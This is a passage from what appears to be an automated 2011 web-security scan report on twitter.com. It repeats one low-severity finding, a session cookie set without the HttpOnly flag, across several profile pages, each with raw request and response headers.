Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225007-69414-28796
ETag: "24db63c3097b33b2dc035ce49f9408ff"
Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT
X-Runtime: 0.01086
Content-Type: text/html; charset=utf-8
Content-Length: 36440
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.58. http://twitter.com/Simply_b06/status/29173383425949696

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Simply_b06/status/29173383425949696

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Simply_b06/status/29173383425949696 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225011-27514-8303
ETag: "296e04489c61ead9a1933e485fa4bd22"
Last-Modified: Fri, 28 Jan 2011 14:30:11 GMT
X-Runtime: 0.07568
Content-Type: text/html; charset=utf-8
Content-Length: 13710
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6DGNzcmZfaWQiJTVlM2JiNjY4%250ANWU3MmNhZmY3NzhhY2E3ODRiNDgwODdhOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--6d295a54df06def6a97568ac94ecdce0d4dc8a97; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.59. http://twitter.com/Siobhan_Magnus

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Siobhan_Magnus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Siobhan_Magnus HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266023-80188-44224
ETag: "ccd41e2f423be9ffd34f56366edc99cd"
Last-Modified: Sat, 29 Jan 2011 01:53:43 GMT
X-Runtime: 0.00959
Content-Type: text/html; charset=utf-8
Content-Length: 49563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.60. http://twitter.com/SlexAxton

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /SlexAxton

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SlexAxton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225045-59196-5393
ETag: "507dff22fcced375038cdd9631235460"
Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT
X-Runtime: 0.00969
Content-Type: text/html; charset=utf-8
Content-Length: 49927
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.61. http://twitter.com/StarWrit

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /StarWrit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StarWrit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265998-47037-26209
ETag: "98f418b00049e64d718057714c24d78d"
Last-Modified: Sat, 29 Jan 2011 01:53:18 GMT
X-Runtime: 0.01212
Content-Type: text/html; charset=utf-8
Content-Length: 69129
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.62. http://twitter.com/Support

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-79439-58935
ETag: "6f3f0f6d45a5a9149a4d122ad96ea840"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01685
Content-Type: text/html; charset=utf-8
Content-Length: 51752
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.63. http://twitter.com/Svantasukhai

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Svantasukhai

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Svantasukhai HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-92538-25020
ETag: "b5b7378e54ede43eec0f6508eb5d2185"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.00759
Content-Type: text/html; charset=utf-8
Content-Length: 29522
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.64. http://twitter.com/THE_REAL_SHAQ

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /THE_REAL_SHAQ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /THE_REAL_SHAQ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:44:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265476-22093-12798
ETag: "2292bad8ff862731407148084ee7d5a9"
Last-Modified: Sat, 29 Jan 2011 01:44:36 GMT
X-Runtime: 0.00794
Content-Type: text/html; charset=utf-8
Content-Length: 49010
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.65. http://twitter.com/TV38Boston

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /TV38Boston

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TV38Boston HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266035-61347-31781
ETag: "44a74d1afcf9bd83d65e21c61083ec35"
Last-Modified: Sat, 29 Jan 2011 01:53:55 GMT
X-Runtime: 0.01014
Content-Type: text/html; charset=utf-8
Content-Length: 19747
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.66. http://twitter.com/TechCrunch

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /TechCrunch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-62897-59906
ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.00806
Content-Type: text/html; charset=utf-8
Content-Length: 54066
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.67. http://twitter.com/TheKateBosworth

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /TheKateBosworth

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TheKateBosworth HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-80143-41969
ETag: "2e949d88eb257784b5bf1e7f6b09ebc5"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.01545
Content-Type: text/html; charset=utf-8
Content-Length: 27140
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
